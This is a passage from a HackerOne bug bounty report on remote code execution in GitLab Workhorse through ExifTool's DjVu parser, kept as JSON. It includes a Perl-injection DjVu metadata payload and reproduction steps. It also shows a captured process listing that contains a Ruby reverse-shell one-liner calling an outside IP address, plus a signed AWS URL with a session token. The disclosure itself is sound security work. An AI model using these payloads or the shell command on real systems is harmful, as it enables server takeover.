/opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T02:36:26", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T01:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T01:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ3WLHNKEN%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T023625Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEG8aCXVzLXdlc3QtMiJHMEUCIFBRy7pe%2Fr%2FaQ%2BaMH0zEFzTI2v7CAUA5aud2Fz5HCrvuAiEAyHbQkFZkPT6KhqubOW7f2ljtYCw61SVjmfUHLU3FYY8qgwQI%2BP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARACGgwwMTM2MTkyNzQ4NDkiDAMJ9YFhqztCHJO74irXA%2FQXWn80fhQgcaLvUP%2BbW1FGgYwifX%2B3f82L0OB%2BmZ61S6f44ReIwozHXj2p3rUcKTWfk6uiOn7EmgOXamRg5gl6MZGfyYfRZqPkifqviJkHsaCf51d2pEprKgJSr1ThDNxzoq5A732WMspozUqusnlnmbg6ovrtU%2Bbb4e9aOsJ70itWKrN9n7DJslXLGR9aHThJ%2FKirIAJdtQ5FDASJO4OsWv3jP8WsLi9JBuhBBHYfScNGU7ZW5YhZNRS3KhAF4NRcv44naScSm3ZK7Ld1GEiiVIBRWrP7BlgXEjesh%2FMMa%2Fi1t3l%2Bw%2BWpD24H%2FZ%2B3iBAJB4nIjo1vm38Uwp8g2JVFO3qqg77v0uLTY8sa7b8Zouf5qGg6e%2FxNtyh%2FgXk%2B9%2Ff9rGSj8bhqXOpdwoi9MP1I3nJmnCv5LZCzA4O%2F1zVrWpRKJWH7y7L%2BiYE9mCcCVKQGMOx0xMH7vzCLyGn9kZIhkePafMXD2KZ7cFgEYt9kIrTJHQ3heTEAJfIHwXpxUl2%2Btkb8wLfStDnMRKY1ZB7KCYkGluiUWbwoW5JzP1qK406SPp57WRSmr%2FO4dFWJIOE6Dg7iwbDpHzDaEt5CWnOqTtRTv8ZYzZ%2FQHEromnBPZ2JHkSEIMTDa%2F%2FuEBjqlAfGKreobVmYhKDj9VsxE6n4HJ9%2FE2mhM70uYo%2FjH9NZ%2Fez%2F4SHLpPbWYUAs45Cey4v6z84TUSvRcGgxTa3NyjSKhIKOgJQFGn9kl5Pah1rBiMOxAZMnufFCuJ3jmgVFltPfNWmc%2BLry6WN0o19KSMH599Ke5uEdMCSyalp1JUsJ41vt3Y8wZZMeeZqdSzcaY273a5lyKgt2gt2FU9ycaarC9v7ycvA%3D%3D&X-Amz-Signature=4b4f15d6749adcc4ed2d02aac73260a9593681fa7bb9b91a6c00db1492ead638"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T02:36:26", "differentElements": ["h1reporter"], "edition": 6}, {"bulletin": {"id": "H1:1154542", "hash": "9bab3f3d314dd7b54c21e56cc52b72cf", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 